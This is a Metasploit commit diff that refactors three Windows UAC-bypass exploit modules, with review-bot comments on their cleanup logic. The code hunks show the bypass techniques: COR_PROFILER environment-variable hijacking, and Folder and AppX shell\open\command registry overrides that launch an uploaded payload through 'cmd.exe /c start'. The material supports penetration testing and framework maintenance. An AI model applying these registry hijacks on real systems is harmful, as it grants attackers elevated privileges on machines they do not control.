Land #17350, Remove unnecesary sleep
Remove unnecessary sleep in several bypassuac modules
commit
d09aef7dc5
|
@ -105,6 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@reg_keys = []
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -140,31 +141,30 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
uuid = SecureRandom.uuid
|
||||
vprint_status("UUID = #{uuid}")
|
||||
reg_keys = []
|
||||
# This reg key will not hurt anything in windows 10+, but is not required.
|
||||
unless sysinfo['OS'] =~ /Windows (2016|10)/
|
||||
reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
|
||||
@reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
|
||||
value_name: '',
|
||||
value_type: "REG_EXPAND_SZ",
|
||||
value_value: payload_pathname,
|
||||
delete_on_cleanup: false)
|
||||
end
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_PROFILER",
|
||||
value_type: "REG_SZ",
|
||||
value_value: "{#{uuid}}",
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_ENABLE_PROFILING",
|
||||
value_type: "REG_SZ",
|
||||
value_value: "1",
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.push(key_name: "HKCU\\Environment",
|
||||
@reg_keys.push(key_name: "HKCU\\Environment",
|
||||
value_name: "COR_PROFILER_PATH",
|
||||
value_type: "REG_SZ",
|
||||
value_value: payload_pathname,
|
||||
delete_on_cleanup: false)
|
||||
reg_keys.each do |key_hash|
|
||||
@reg_keys.each do |key_hash|
|
||||
write_reg_value(key_hash)
|
||||
end
|
||||
|
||||
|
@ -179,16 +179,19 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
print_status("Please wait for session and cleanup....")
|
||||
sleep(20)
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @reg_keys.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
reg_keys.each do |key_hash|
|
||||
@reg_keys.each do |key_hash|
|
||||
remove_reg_value(key_hash)
|
||||
end
|
||||
vprint_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
|
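Review bot: Every hash pushed onto `@reg_keys` in the exploit body carries `delete_on_cleanup: false`, yet `cleanup` passes each of them to `remove_reg_value`, so the flag and the loop disagree about whether the COR_PROFILER values written under `HKCU\Environment` are removed; if `remove_reg_value` honours the flag, the profiler hook outlives the session for every process that user starts afterwards. A comment on the push block should state which is intended, e.g. `# delete_on_cleanup is not consulted here: cleanup removes every entry in @reg_keys`. Dropping `sleep(20)` also means cleanup runs as soon as `exploit` returns, which is only safe if the elevated process has already consumed these values; that is presumably established by the trigger code outside this hunk, and a one-line comment above the manual-cleanup warning would record the assumption. The same sleep removal appears in the two later file sections of this commit.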
@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@registry_key = ''
|
||||
@remove_registry_key = false
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -95,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
|
||||
remove_registry_key = !registry_key_exist?(registry_key)
|
||||
@registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
|
||||
@remove_registry_key = !registry_key_exist?(@registry_key)
|
||||
|
||||
# get directory locations straight
|
||||
win_dir = session.sys.config.getenv('windir')
|
||||
|
@ -116,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
payload = generate_payload_exe
|
||||
reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
|
||||
vprint_status("reg_command = " + reg_command)
|
||||
write_reg_values(registry_key, reg_command)
|
||||
write_reg_values(@registry_key, reg_command)
|
||||
|
||||
# Upload payload
|
||||
vprint_status("Uploading Payload to #{payload_pathname}")
|
||||
|
@ -129,19 +131,22 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue ::Exception => e
|
||||
print_error("Executing command failed:\n#{e}")
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
print_status("Please wait for session and cleanup....")
|
||||
sleep(20)
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @registry_key.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
if remove_registry_key
|
||||
registry_deletekey(registry_key)
|
||||
if @remove_registry_key
|
||||
registry_deletekey(@registry_key)
|
||||
else
|
||||
registry_deleteval(registry_key, "DelegateExecute")
|
||||
registry_deleteval(registry_key, '')
|
||||
registry_deleteval(@registry_key, "DelegateExecute")
|
||||
registry_deleteval(@registry_key, '')
|
||||
end
|
||||
print_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
|
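Review bot: When the key already existed, cleanup's else branch deletes the `DelegateExecute` and default values of `@registry_key` instead of restoring what `write_reg_values` overwrote, so a pre-existing `Folder\shell\open\command` handler is left empty after the module runs; `@remove_registry_key` only records existence, not the prior values. Unless `write_reg_values` (outside this hunk) saves them, consider reading both values before the write and restoring them in cleanup, or at least a comment on the `@remove_registry_key` assignment such as `# only records whether the key pre-existed; prior values are not preserved`. The `rescue ::Exception => e` above the warning still catches SystemExit and SignalException; `rescue StandardError => e` is the narrower form.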
@ -69,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
@registry_key = ''
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
|
@ -103,14 +104,14 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
payload = generate_payload_exe
|
||||
reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
|
||||
vprint_status("reg_command = " + reg_command)
|
||||
registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
|
||||
@registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
|
||||
|
||||
# make registry changes
|
||||
vprint_status("Making Registry Changes")
|
||||
begin
|
||||
registry_createkey(registry_key)
|
||||
registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
|
||||
registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
|
||||
registry_createkey(@registry_key)
|
||||
registry_setvaldata(@registry_key, "DelegateExecute", '', "REG_SZ")
|
||||
registry_setvaldata(@registry_key, '', reg_command, "REG_SZ")
|
||||
rescue ::Exception => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
|
@ -126,13 +127,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
rescue ::Exception => e
|
||||
print_error(e.to_s)
|
||||
end
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
|
||||
# wait for a few seconds before cleaning up
|
||||
sleep(20)
|
||||
print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if @registry_key.present?
|
||||
vprint_status("Removing Registry Changes")
|
||||
registry_deletekey(registry_key)
|
||||
registry_deletekey(@registry_key)
|
||||
vprint_status("Registry Changes Removed")
|
||||
end
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
|
|
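Review bot: `@registry_key` is assigned before `registry_createkey` runs, and the `rescue ::Exception` block only prints the error, so a failed key creation falls through to the code after the hunk (presumably the payload upload and trigger) while `cleanup` will still call `registry_deletekey` on a key that was never created. A bail-out after `print_error(e.to_s)`, e.g. `return`, matching the early `return` the Folder\shell module in this commit uses, would stop the module from continuing with no handler in place. Unlike that module, this cleanup also deletes the AppX key unconditionally: the `@registry_key.present?` guard only tests the instance variable, so a pre-existing key and its prior values are removed rather than restored.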